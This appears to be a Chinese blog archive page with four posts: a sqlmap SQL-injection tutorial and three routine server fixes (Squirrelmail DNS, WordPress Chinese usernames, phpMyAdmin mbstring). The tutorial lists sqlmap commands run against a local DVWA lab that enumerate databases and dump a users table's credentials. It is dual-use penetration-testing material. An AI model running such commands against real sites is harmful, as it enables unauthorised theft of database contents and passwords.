Date Archives

四月 2018

Sqlmap 数据库注入工具

0x00 官方对与工具的解释

sqlmap是一款开源渗透测试工具,可自动检测和利用SQL注入漏洞并接管数据库服务器。它具有强大的检测引擎,针对终极渗透测试人员的众多特性,以及从数据库指纹识别,从数据库获取数据,到访问底层文件系统以及在操作系统上执行命令的各种开关,带外连接。

0x01 一些常用的选项

  •     –dump                       转储DBMS数据库表条目
  •     –dump-all                  转储所有DBMS数据库表条目
  •     –tables                       枚举DBMS数据库表
  •     –columns                   枚举DBMS数据库表列
  •     –u                               指定目标的URL
  •     –cookie=COOKIE     HTTP Cookie标头值
  •     –level=LEVEL           要执行的测试级别(1-5,默认值1)
  •     –risk=RISK                要执行测试的风险(1-3,默认值1)
  •    –dbms=DBMS            强制指定数据库类

0x02 简单的测试实例

1.  检测注入点

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1"

 

2.  列出数据库

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" --dbs

 

3.  列出指定数据库中的表

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa --tables

 

4.  列出指定表中的列

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dwwa -T users --columns

 

5.  dump出指定列中的数据字段,及帐号密码

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa -T users --columns --dump

 

持续编辑中~

Error connecting to IMAP server: dovecot. 解决方法

  • CentOS              6.7
  • Squirrelmail       1.4.22
  • Dovecot             2.0.9
  • Postfix                2.6.6

今天部署 Squirrelmail 系统,放好源码包之后开始访问,登录账号密码后,一个从未见过的 Error 就出来了

Error connecting to IMAP server: dovecot.
0 : php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution

先跑去翻译了一下,大致意思是: IMAP 服务器连接失败,目标 Dovecot ,获取地址信息失败,名称解析信息失败

 

然后想了一下我的环境里唯一涉及到 “名称“ 的,就只有 DNS 服务了,就跑去看了 DNS 服务的配置,在尝试解析~,然而没有任何问题,之后为了搜索信息把 CentOS 的网络改为 NAT 模式 (因为要上网当然 DNS 也改成了公网的8.8.8.8),之后又无意中刷新了一下网页,无意中登录了一下,竟然就登录进去了,当我再把 DNS 服务器改成自己后便又无法登录,,这里想之前的报错”名称解析失败“,分析一下原可能就是因为 DNS 了,所以解决的办法就是把 DNS 指向可用的公网 DNS 服务器

 

wordpress 支持中文注册用户的方法

在部署我自己的wordpress网站之后就是一系列的功能添加优化,添加滑块,更换主题,用户中心,等等各种功能,不过到今天刚发现我的wordpress竟然不能注册中文用户,为此又百度了一番,今天也解决了这个问题,这里分享给大家

找到主题的functions.php 文件,在文件尾部添加
function ludou_non_strict_login( $username, $raw_username, $strict ) {
if( !$strict )
return $username;
return sanitize_user(stripslashes($raw_username), false);
}
add_filter('sanitize_user', 'ludou_non_strict_login', 10, 3);
之后刷新页面再次注册就可以注册中文用户啦~

解决:phpMyAdmin – Error The mbstring extension is missing

提示实际上已经很清楚了,php找不到mbstring的扩展,想想我安装环境的时候确实没有安装这个扩展包,所以要解决它很简单。

我的搭建环境

php                    5.3.3
httpd                 2.2.15
mysql                 5.1.73
centos               6.7
phpMyAdmin    4.0.10.20

安装mbstring扩展即可
yum install php-mbstring

之后刷新你的服务,就可以访问phpMyAdmin啦~